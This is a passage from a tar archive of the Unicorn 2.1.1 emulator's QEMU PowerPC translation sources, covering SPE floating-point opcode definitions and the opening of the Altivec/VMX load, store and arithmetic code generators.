speundef, 0x03, 0x0A, 0x0000F800, 0xFFFFFFFF, PPC_SPE_SINGLE); // GEN_SPE(evfsmul, evfsdiv, 0x04, 0x0A, 0x00000000, 0x00000000, PPC_SPE_SINGLE); // GEN_SPE(evfscmpgt, evfscmplt, 0x06, 0x0A, 0x00600000, 0x00600000, PPC_SPE_SINGLE); // GEN_SPE(evfscmpeq, speundef, 0x07, 0x0A, 0x00600000, 0xFFFFFFFF, PPC_SPE_SINGLE); // GEN_SPE(evfscfui, evfscfsi, 0x08, 0x0A, 0x00180000, 0x00180000, PPC_SPE_SINGLE); // GEN_SPE(evfscfuf, evfscfsf, 0x09, 0x0A, 0x00180000, 0x00180000, PPC_SPE_SINGLE); // GEN_SPE(evfsctui, evfsctsi, 0x0A, 0x0A, 0x00180000, 0x00180000, PPC_SPE_SINGLE); // GEN_SPE(evfsctuf, evfsctsf, 0x0B, 0x0A, 0x00180000, 0x00180000, PPC_SPE_SINGLE); // GEN_SPE(evfsctuiz, speundef, 0x0C, 0x0A, 0x00180000, 0xFFFFFFFF, PPC_SPE_SINGLE); // GEN_SPE(evfsctsiz, speundef, 0x0D, 0x0A, 0x00180000, 0xFFFFFFFF, PPC_SPE_SINGLE); // GEN_SPE(evfststgt, evfststlt, 0x0E, 0x0A, 0x00600000, 0x00600000, PPC_SPE_SINGLE); // GEN_SPE(evfststeq, speundef, 0x0F, 0x0A, 0x00600000, 0xFFFFFFFF, PPC_SPE_SINGLE); // /* Single precision floating-point operations */ /* Arithmetic */ GEN_SPEFPUOP_ARITH2_32_32(efsadd); GEN_SPEFPUOP_ARITH2_32_32(efssub); GEN_SPEFPUOP_ARITH2_32_32(efsmul); GEN_SPEFPUOP_ARITH2_32_32(efsdiv); static inline void gen_efsabs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_andi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], (target_long)~0x80000000LL); } static inline void gen_efsnabs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_ori_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], 0x80000000); } static inline void gen_efsneg(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_xori_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], 0x80000000); } /* Conversion */ GEN_SPEFPUOP_CONV_32_32(efscfui); GEN_SPEFPUOP_CONV_32_32(efscfsi); GEN_SPEFPUOP_CONV_32_32(efscfuf); GEN_SPEFPUOP_CONV_32_32(efscfsf); GEN_SPEFPUOP_CONV_32_32(efsctui); GEN_SPEFPUOP_CONV_32_32(efsctsi); GEN_SPEFPUOP_CONV_32_32(efsctuf); GEN_SPEFPUOP_CONV_32_32(efsctsf); GEN_SPEFPUOP_CONV_32_32(efsctuiz); GEN_SPEFPUOP_CONV_32_32(efsctsiz); GEN_SPEFPUOP_CONV_32_64(efscfd); /* Comparison */ GEN_SPEFPUOP_COMP_32(efscmpgt); GEN_SPEFPUOP_COMP_32(efscmplt); GEN_SPEFPUOP_COMP_32(efscmpeq); GEN_SPEFPUOP_COMP_32(efststgt); GEN_SPEFPUOP_COMP_32(efststlt); GEN_SPEFPUOP_COMP_32(efststeq); /* Opcodes definitions */ GEN_SPE(efsadd, efssub, 0x00, 0x0B, 0x00000000, 0x00000000, PPC_SPE_SINGLE); // GEN_SPE(efsabs, efsnabs, 0x02, 0x0B, 0x0000F800, 0x0000F800, PPC_SPE_SINGLE); // GEN_SPE(efsneg, speundef, 0x03, 0x0B, 0x0000F800, 0xFFFFFFFF, PPC_SPE_SINGLE); // GEN_SPE(efsmul, efsdiv, 0x04, 0x0B, 0x00000000, 0x00000000, PPC_SPE_SINGLE); // GEN_SPE(efscmpgt, efscmplt, 0x06, 0x0B, 0x00600000, 0x00600000, PPC_SPE_SINGLE); // GEN_SPE(efscmpeq, efscfd, 0x07, 0x0B, 0x00600000, 0x00180000, PPC_SPE_SINGLE); // GEN_SPE(efscfui, efscfsi, 0x08, 0x0B, 0x00180000, 0x00180000, PPC_SPE_SINGLE); // GEN_SPE(efscfuf, efscfsf, 0x09, 0x0B, 0x00180000, 0x00180000, PPC_SPE_SINGLE); // GEN_SPE(efsctui, efsctsi, 0x0A, 0x0B, 0x00180000, 0x00180000, PPC_SPE_SINGLE); // GEN_SPE(efsctuf, efsctsf, 0x0B, 0x0B, 0x00180000, 0x00180000, PPC_SPE_SINGLE); // GEN_SPE(efsctuiz, speundef, 0x0C, 0x0B, 0x00180000, 0xFFFFFFFF, PPC_SPE_SINGLE); // GEN_SPE(efsctsiz, speundef, 0x0D, 0x0B, 0x00180000, 0xFFFFFFFF, PPC_SPE_SINGLE); // GEN_SPE(efststgt, efststlt, 0x0E, 0x0B, 0x00600000, 0x00600000, PPC_SPE_SINGLE); // GEN_SPE(efststeq, speundef, 0x0F, 0x0B, 0x00600000, 0xFFFFFFFF, PPC_SPE_SINGLE); // /* Double precision floating-point operations */ /* Arithmetic */ GEN_SPEFPUOP_ARITH2_64_64(efdadd); GEN_SPEFPUOP_ARITH2_64_64(efdsub); GEN_SPEFPUOP_ARITH2_64_64(efdmul); GEN_SPEFPUOP_ARITH2_64_64(efddiv); static inline void gen_efdabs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); tcg_gen_andi_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rA(ctx->opcode)], ~0x80000000); } static inline void gen_efdnabs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); tcg_gen_ori_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rA(ctx->opcode)], 0x80000000); } static inline void gen_efdneg(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); tcg_gen_xori_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rA(ctx->opcode)], 0x80000000); } /* Conversion */ GEN_SPEFPUOP_CONV_64_32(efdcfui); GEN_SPEFPUOP_CONV_64_32(efdcfsi); GEN_SPEFPUOP_CONV_64_32(efdcfuf); GEN_SPEFPUOP_CONV_64_32(efdcfsf); GEN_SPEFPUOP_CONV_32_64(efdctui); GEN_SPEFPUOP_CONV_32_64(efdctsi); GEN_SPEFPUOP_CONV_32_64(efdctuf); GEN_SPEFPUOP_CONV_32_64(efdctsf); GEN_SPEFPUOP_CONV_32_64(efdctuiz); GEN_SPEFPUOP_CONV_32_64(efdctsiz); GEN_SPEFPUOP_CONV_64_32(efdcfs); GEN_SPEFPUOP_CONV_64_64(efdcfuid); GEN_SPEFPUOP_CONV_64_64(efdcfsid); GEN_SPEFPUOP_CONV_64_64(efdctuidz); GEN_SPEFPUOP_CONV_64_64(efdctsidz); /* Comparison */ GEN_SPEFPUOP_COMP_64(efdcmpgt); GEN_SPEFPUOP_COMP_64(efdcmplt); GEN_SPEFPUOP_COMP_64(efdcmpeq); GEN_SPEFPUOP_COMP_64(efdtstgt); GEN_SPEFPUOP_COMP_64(efdtstlt); GEN_SPEFPUOP_COMP_64(efdtsteq); /* Opcodes definitions */ GEN_SPE(efdadd, efdsub, 0x10, 0x0B, 0x00000000, 0x00000000, PPC_SPE_DOUBLE); // GEN_SPE(efdcfuid, efdcfsid, 0x11, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE); // GEN_SPE(efdabs, efdnabs, 0x12, 0x0B, 0x0000F800, 0x0000F800, PPC_SPE_DOUBLE); // GEN_SPE(efdneg, speundef, 0x13, 0x0B, 0x0000F800, 0xFFFFFFFF, PPC_SPE_DOUBLE); // GEN_SPE(efdmul, efddiv, 0x14, 0x0B, 0x00000000, 0x00000000, PPC_SPE_DOUBLE); // GEN_SPE(efdctuidz, efdctsidz, 0x15, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE); // GEN_SPE(efdcmpgt, efdcmplt, 0x16, 0x0B, 0x00600000, 0x00600000, PPC_SPE_DOUBLE); // GEN_SPE(efdcmpeq, efdcfs, 0x17, 0x0B, 0x00600000, 0x00180000, PPC_SPE_DOUBLE); // GEN_SPE(efdcfui, efdcfsi, 0x18, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE); // GEN_SPE(efdcfuf, efdcfsf, 0x19, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE); // GEN_SPE(efdctui, efdctsi, 0x1A, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE); // GEN_SPE(efdctuf, efdctsf, 0x1B, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE); // GEN_SPE(efdctuiz, speundef, 0x1C, 0x0B, 0x00180000, 0xFFFFFFFF, PPC_SPE_DOUBLE); // GEN_SPE(efdctsiz, speundef, 0x1D, 0x0B, 0x00180000, 0xFFFFFFFF, PPC_SPE_DOUBLE); // GEN_SPE(efdtstgt, efdtstlt, 0x1E, 0x0B, 0x00600000, 0x00600000, PPC_SPE_DOUBLE); // GEN_SPE(efdtsteq, speundef, 0x1F, 0x0B, 0x00600000, 0xFFFFFFFF, PPC_SPE_DOUBLE); // #undef GEN_SPE #undef GEN_SPEOP_LDST ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/translate/spe-ops.inc.c�����������������������������������������������0000664�0000000�0000000�00000016262�14675241067�0022531�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������GEN_HANDLER2(evsel0, "evsel", 0x04, 0x1c, 0x09, 0x00000000, PPC_SPE), GEN_HANDLER2(evsel1, "evsel", 0x04, 0x1d, 0x09, 0x00000000, PPC_SPE), GEN_HANDLER2(evsel2, "evsel", 0x04, 0x1e, 0x09, 0x00000000, PPC_SPE), GEN_HANDLER2(evsel3, "evsel", 0x04, 0x1f, 0x09, 0x00000000, PPC_SPE), #define GEN_SPE(name0, name1, opc2, opc3, inval0, inval1, type) \ GEN_OPCODE_DUAL(name0##_##name1, 0x04, opc2, opc3, inval0, inval1, type, PPC_NONE) GEN_SPE(evaddw, speundef, 0x00, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE), GEN_SPE(evaddiw, speundef, 0x01, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE), GEN_SPE(evsubfw, speundef, 0x02, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE), GEN_SPE(evsubifw, speundef, 0x03, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE), GEN_SPE(evabs, evneg, 0x04, 0x08, 0x0000F800, 0x0000F800, PPC_SPE), GEN_SPE(evextsb, evextsh, 0x05, 0x08, 0x0000F800, 0x0000F800, PPC_SPE), GEN_SPE(evrndw, evcntlzw, 0x06, 0x08, 0x0000F800, 0x0000F800, PPC_SPE), GEN_SPE(evcntlsw, brinc, 0x07, 0x08, 0x0000F800, 0x00000000, PPC_SPE), GEN_SPE(evmra, speundef, 0x02, 0x13, 0x0000F800, 0xFFFFFFFF, PPC_SPE), GEN_SPE(speundef, evand, 0x08, 0x08, 0xFFFFFFFF, 0x00000000, PPC_SPE), GEN_SPE(evandc, speundef, 0x09, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE), GEN_SPE(evxor, evor, 0x0B, 0x08, 0x00000000, 0x00000000, PPC_SPE), GEN_SPE(evnor, eveqv, 0x0C, 0x08, 0x00000000, 0x00000000, PPC_SPE), GEN_SPE(evmwumi, evmwsmi, 0x0C, 0x11, 0x00000000, 0x00000000, PPC_SPE), GEN_SPE(evmwumia, evmwsmia, 0x1C, 0x11, 0x00000000, 0x00000000, PPC_SPE), GEN_SPE(evmwumiaa, evmwsmiaa, 0x0C, 0x15, 0x00000000, 0x00000000, PPC_SPE), GEN_SPE(speundef, evorc, 0x0D, 0x08, 0xFFFFFFFF, 0x00000000, PPC_SPE), GEN_SPE(evnand, speundef, 0x0F, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE), GEN_SPE(evsrwu, evsrws, 0x10, 0x08, 0x00000000, 0x00000000, PPC_SPE), GEN_SPE(evsrwiu, evsrwis, 0x11, 0x08, 0x00000000, 0x00000000, PPC_SPE), GEN_SPE(evslw, speundef, 0x12, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE), GEN_SPE(evslwi, speundef, 0x13, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE), GEN_SPE(evrlw, evsplati, 0x14, 0x08, 0x00000000, 0x0000F800, PPC_SPE), GEN_SPE(evrlwi, evsplatfi, 0x15, 0x08, 0x00000000, 0x0000F800, PPC_SPE), GEN_SPE(evmergehi, evmergelo, 0x16, 0x08, 0x00000000, 0x00000000, PPC_SPE), GEN_SPE(evmergehilo, evmergelohi, 0x17, 0x08, 0x00000000, 0x00000000, PPC_SPE), GEN_SPE(evcmpgtu, evcmpgts, 0x18, 0x08, 0x00600000, 0x00600000, PPC_SPE), GEN_SPE(evcmpltu, evcmplts, 0x19, 0x08, 0x00600000, 0x00600000, PPC_SPE), GEN_SPE(evcmpeq, speundef, 0x1A, 0x08, 0x00600000, 0xFFFFFFFF, PPC_SPE), GEN_SPE(evfsadd, evfssub, 0x00, 0x0A, 0x00000000, 0x00000000, PPC_SPE_SINGLE), GEN_SPE(evfsabs, evfsnabs, 0x02, 0x0A, 0x0000F800, 0x0000F800, PPC_SPE_SINGLE), GEN_SPE(evfsneg, speundef, 0x03, 0x0A, 0x0000F800, 0xFFFFFFFF, PPC_SPE_SINGLE), GEN_SPE(evfsmul, evfsdiv, 0x04, 0x0A, 0x00000000, 0x00000000, PPC_SPE_SINGLE), GEN_SPE(evfscmpgt, evfscmplt, 0x06, 0x0A, 0x00600000, 0x00600000, PPC_SPE_SINGLE), GEN_SPE(evfscmpeq, speundef, 0x07, 0x0A, 0x00600000, 0xFFFFFFFF, PPC_SPE_SINGLE), GEN_SPE(evfscfui, evfscfsi, 0x08, 0x0A, 0x00180000, 0x00180000, PPC_SPE_SINGLE), GEN_SPE(evfscfuf, evfscfsf, 0x09, 0x0A, 0x00180000, 0x00180000, PPC_SPE_SINGLE), GEN_SPE(evfsctui, evfsctsi, 0x0A, 0x0A, 0x00180000, 0x00180000, PPC_SPE_SINGLE), GEN_SPE(evfsctuf, evfsctsf, 0x0B, 0x0A, 0x00180000, 0x00180000, PPC_SPE_SINGLE), GEN_SPE(evfsctuiz, speundef, 0x0C, 0x0A, 0x00180000, 0xFFFFFFFF, PPC_SPE_SINGLE), GEN_SPE(evfsctsiz, speundef, 0x0D, 0x0A, 0x00180000, 0xFFFFFFFF, PPC_SPE_SINGLE), GEN_SPE(evfststgt, evfststlt, 0x0E, 0x0A, 0x00600000, 0x00600000, PPC_SPE_SINGLE), GEN_SPE(evfststeq, speundef, 0x0F, 0x0A, 0x00600000, 0xFFFFFFFF, PPC_SPE_SINGLE), GEN_SPE(efsadd, efssub, 0x00, 0x0B, 0x00000000, 0x00000000, PPC_SPE_SINGLE), GEN_SPE(efsabs, efsnabs, 0x02, 0x0B, 0x0000F800, 0x0000F800, PPC_SPE_SINGLE), GEN_SPE(efsneg, speundef, 0x03, 0x0B, 0x0000F800, 0xFFFFFFFF, PPC_SPE_SINGLE), GEN_SPE(efsmul, efsdiv, 0x04, 0x0B, 0x00000000, 0x00000000, PPC_SPE_SINGLE), GEN_SPE(efscmpgt, efscmplt, 0x06, 0x0B, 0x00600000, 0x00600000, PPC_SPE_SINGLE), GEN_SPE(efscmpeq, efscfd, 0x07, 0x0B, 0x00600000, 0x00180000, PPC_SPE_SINGLE), GEN_SPE(efscfui, efscfsi, 0x08, 0x0B, 0x00180000, 0x00180000, PPC_SPE_SINGLE), GEN_SPE(efscfuf, efscfsf, 0x09, 0x0B, 0x00180000, 0x00180000, PPC_SPE_SINGLE), GEN_SPE(efsctui, efsctsi, 0x0A, 0x0B, 0x00180000, 0x00180000, PPC_SPE_SINGLE), GEN_SPE(efsctuf, efsctsf, 0x0B, 0x0B, 0x00180000, 0x00180000, PPC_SPE_SINGLE), GEN_SPE(efsctuiz, speundef, 0x0C, 0x0B, 0x00180000, 0xFFFFFFFF, PPC_SPE_SINGLE), GEN_SPE(efsctsiz, speundef, 0x0D, 0x0B, 0x00180000, 0xFFFFFFFF, PPC_SPE_SINGLE), GEN_SPE(efststgt, efststlt, 0x0E, 0x0B, 0x00600000, 0x00600000, PPC_SPE_SINGLE), GEN_SPE(efststeq, speundef, 0x0F, 0x0B, 0x00600000, 0xFFFFFFFF, PPC_SPE_SINGLE), GEN_SPE(efdadd, efdsub, 0x10, 0x0B, 0x00000000, 0x00000000, PPC_SPE_DOUBLE), GEN_SPE(efdcfuid, efdcfsid, 0x11, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE), GEN_SPE(efdabs, efdnabs, 0x12, 0x0B, 0x0000F800, 0x0000F800, PPC_SPE_DOUBLE), GEN_SPE(efdneg, speundef, 0x13, 0x0B, 0x0000F800, 0xFFFFFFFF, PPC_SPE_DOUBLE), GEN_SPE(efdmul, efddiv, 0x14, 0x0B, 0x00000000, 0x00000000, PPC_SPE_DOUBLE), GEN_SPE(efdctuidz, efdctsidz, 0x15, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE), GEN_SPE(efdcmpgt, efdcmplt, 0x16, 0x0B, 0x00600000, 0x00600000, PPC_SPE_DOUBLE), GEN_SPE(efdcmpeq, efdcfs, 0x17, 0x0B, 0x00600000, 0x00180000, PPC_SPE_DOUBLE), GEN_SPE(efdcfui, efdcfsi, 0x18, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE), GEN_SPE(efdcfuf, efdcfsf, 0x19, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE), GEN_SPE(efdctui, efdctsi, 0x1A, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE), GEN_SPE(efdctuf, efdctsf, 0x1B, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE), GEN_SPE(efdctuiz, speundef, 0x1C, 0x0B, 0x00180000, 0xFFFFFFFF, PPC_SPE_DOUBLE), GEN_SPE(efdctsiz, speundef, 0x1D, 0x0B, 0x00180000, 0xFFFFFFFF, PPC_SPE_DOUBLE), GEN_SPE(efdtstgt, efdtstlt, 0x1E, 0x0B, 0x00600000, 0x00600000, PPC_SPE_DOUBLE), GEN_SPE(efdtsteq, speundef, 0x1F, 0x0B, 0x00600000, 0xFFFFFFFF, PPC_SPE_DOUBLE), #define GEN_SPEOP_LDST(name, opc2, sh) \ GEN_HANDLER(name, 0x04, opc2, 0x0C, 0x00000000, PPC_SPE) GEN_SPEOP_LDST(evldd, 0x00, 3), GEN_SPEOP_LDST(evldw, 0x01, 3), GEN_SPEOP_LDST(evldh, 0x02, 3), GEN_SPEOP_LDST(evlhhesplat, 0x04, 1), GEN_SPEOP_LDST(evlhhousplat, 0x06, 1), GEN_SPEOP_LDST(evlhhossplat, 0x07, 1), GEN_SPEOP_LDST(evlwhe, 0x08, 2), GEN_SPEOP_LDST(evlwhou, 0x0A, 2), GEN_SPEOP_LDST(evlwhos, 0x0B, 2), GEN_SPEOP_LDST(evlwwsplat, 0x0C, 2), GEN_SPEOP_LDST(evlwhsplat, 0x0E, 2), GEN_SPEOP_LDST(evstdd, 0x10, 3), GEN_SPEOP_LDST(evstdw, 0x11, 3), GEN_SPEOP_LDST(evstdh, 0x12, 3), GEN_SPEOP_LDST(evstwhe, 0x18, 2), GEN_SPEOP_LDST(evstwho, 0x1A, 2), GEN_SPEOP_LDST(evstwwe, 0x1C, 2), GEN_SPEOP_LDST(evstwwo, 0x1E, 2), ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/translate/vmx-impl.inc.c����������������������������������������������0000664�0000000�0000000�00000220340�14675241067�0022706�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * translate/vmx-impl.c * * Altivec/VMX translation */ /*** Altivec vector extension ***/ /* Altivec registers moves */ static inline TCGv_ptr gen_avr_ptr(TCGContext *tcg_ctx, int reg) { TCGv_ptr r = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, r, tcg_ctx->cpu_env, avr_full_offset(reg)); return r; } #define GEN_VR_LDX(name, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 avr; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ gen_set_access_type(ctx, ACCESS_INT); \ avr = tcg_temp_new_i64(tcg_ctx); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ tcg_gen_andi_tl(tcg_ctx, EA, EA, ~0xf); \ /* \ * We only need to swap high and low halves. gen_qemu_ld64_i64 \ * does necessary 64-bit byteswap already. \ */ \ if (ctx->le_mode) { \ gen_qemu_ld64_i64(ctx, avr, EA); \ set_avr64(tcg_ctx, rD(ctx->opcode), avr, false); \ tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); \ gen_qemu_ld64_i64(ctx, avr, EA); \ set_avr64(tcg_ctx, rD(ctx->opcode), avr, true); \ } else { \ gen_qemu_ld64_i64(ctx, avr, EA); \ set_avr64(tcg_ctx, rD(ctx->opcode), avr, true); \ tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); \ gen_qemu_ld64_i64(ctx, avr, EA); \ set_avr64(tcg_ctx, rD(ctx->opcode), avr, false); \ } \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, avr); \ } #define GEN_VR_STX(name, opc2, opc3) \ static void gen_st##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 avr; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ gen_set_access_type(ctx, ACCESS_INT); \ avr = tcg_temp_new_i64(tcg_ctx); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ tcg_gen_andi_tl(tcg_ctx, EA, EA, ~0xf); \ /* \ * We only need to swap high and low halves. gen_qemu_st64_i64 \ * does necessary 64-bit byteswap already. \ */ \ if (ctx->le_mode) { \ get_avr64(tcg_ctx, avr, rD(ctx->opcode), false); \ gen_qemu_st64_i64(ctx, avr, EA); \ tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); \ get_avr64(tcg_ctx, avr, rD(ctx->opcode), true); \ gen_qemu_st64_i64(ctx, avr, EA); \ } else { \ get_avr64(tcg_ctx, avr, rD(ctx->opcode), true); \ gen_qemu_st64_i64(ctx, avr, EA); \ tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); \ get_avr64(tcg_ctx, avr, rD(ctx->opcode), false); \ gen_qemu_st64_i64(ctx, avr, EA); \ } \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, avr); \ } #define GEN_VR_LVE(name, opc2, opc3, size) \ static void gen_lve##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_ptr rs; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ if (size > 1) { \ tcg_gen_andi_tl(tcg_ctx, EA, EA, ~(size - 1)); \ } \ rs = gen_avr_ptr(tcg_ctx, rS(ctx->opcode)); \ gen_helper_lve##name(tcg_ctx, tcg_ctx->cpu_env, rs, EA); \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_ptr(tcg_ctx, rs); \ } #define GEN_VR_STVE(name, opc2, opc3, size) \ static void gen_stve##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_ptr rs; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ if (size > 1) { \ tcg_gen_andi_tl(tcg_ctx, EA, EA, ~(size - 1)); \ } \ rs = gen_avr_ptr(tcg_ctx, rS(ctx->opcode)); \ gen_helper_stve##name(tcg_ctx, tcg_ctx->cpu_env, rs, EA); \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_ptr(tcg_ctx, rs); \ } GEN_VR_LDX(lvx, 0x07, 0x03); /* As we don't emulate the cache, lvxl is stricly equivalent to lvx */ GEN_VR_LDX(lvxl, 0x07, 0x0B); GEN_VR_LVE(bx, 0x07, 0x00, 1); GEN_VR_LVE(hx, 0x07, 0x01, 2); GEN_VR_LVE(wx, 0x07, 0x02, 4); GEN_VR_STX(svx, 0x07, 0x07); /* As we don't emulate the cache, stvxl is stricly equivalent to stvx */ GEN_VR_STX(svxl, 0x07, 0x0F); GEN_VR_STVE(bx, 0x07, 0x04, 1); GEN_VR_STVE(hx, 0x07, 0x05, 2); GEN_VR_STVE(wx, 0x07, 0x06, 4); static void gen_mfvscr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t; TCGv_i64 avr; if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } avr = tcg_temp_new_i64(tcg_ctx); tcg_gen_movi_i64(tcg_ctx, avr, 0); set_avr64(tcg_ctx, rD(ctx->opcode), avr, true); t = tcg_temp_new_i32(tcg_ctx); gen_helper_mfvscr(tcg_ctx, t, tcg_ctx->cpu_env); tcg_gen_extu_i32_i64(tcg_ctx, avr, t); set_avr64(tcg_ctx, rD(ctx->opcode), avr, false); tcg_temp_free_i32(tcg_ctx, t); tcg_temp_free_i64(tcg_ctx, avr); } static void gen_mtvscr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 val; int bofs; if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } val = tcg_temp_new_i32(tcg_ctx); bofs = avr_full_offset(rB(ctx->opcode)); #ifdef HOST_WORDS_BIGENDIAN bofs += 3 * 4; #endif tcg_gen_ld_i32(tcg_ctx, val, tcg_ctx->cpu_env, bofs); gen_helper_mtvscr(tcg_ctx, tcg_ctx->cpu_env, val); tcg_temp_free_i32(tcg_ctx, val); } #define GEN_VX_VMUL10(name, add_cin, ret_carry) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; \ TCGv_i64 t1; \ TCGv_i64 t2; \ TCGv_i64 avr; \ TCGv_i64 ten, z; \ \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ \ t0 = tcg_temp_new_i64(tcg_ctx); \ t1 = tcg_temp_new_i64(tcg_ctx); \ t2 = tcg_temp_new_i64(tcg_ctx); \ avr = tcg_temp_new_i64(tcg_ctx); \ ten = tcg_const_i64(tcg_ctx, 10); \ z = tcg_const_i64(tcg_ctx, 0); \ \ if (add_cin) { \ get_avr64(tcg_ctx, avr, rA(ctx->opcode), false); \ tcg_gen_mulu2_i64(tcg_ctx, t0, t1, avr, ten); \ get_avr64(tcg_ctx, avr, rB(ctx->opcode), false); \ tcg_gen_andi_i64(tcg_ctx, t2, avr, 0xF); \ tcg_gen_add2_i64(tcg_ctx, avr, t2, t0, t1, t2, z); \ set_avr64(tcg_ctx, rD(ctx->opcode), avr, false); \ } else { \ get_avr64(tcg_ctx, avr, rA(ctx->opcode), false); \ tcg_gen_mulu2_i64(tcg_ctx, avr, t2, avr, ten); \ set_avr64(tcg_ctx, rD(ctx->opcode), avr, false); \ } \ \ if (ret_carry) { \ get_avr64(tcg_ctx, avr, rA(ctx->opcode), true); \ tcg_gen_mulu2_i64(tcg_ctx, t0, t1, avr, ten); \ tcg_gen_add2_i64(tcg_ctx, t0, avr, t0, t1, t2, z); \ set_avr64(tcg_ctx, rD(ctx->opcode), avr, false); \ set_avr64(tcg_ctx, rD(ctx->opcode), z, true); \ } else { \ get_avr64(tcg_ctx, avr, rA(ctx->opcode), true); \ 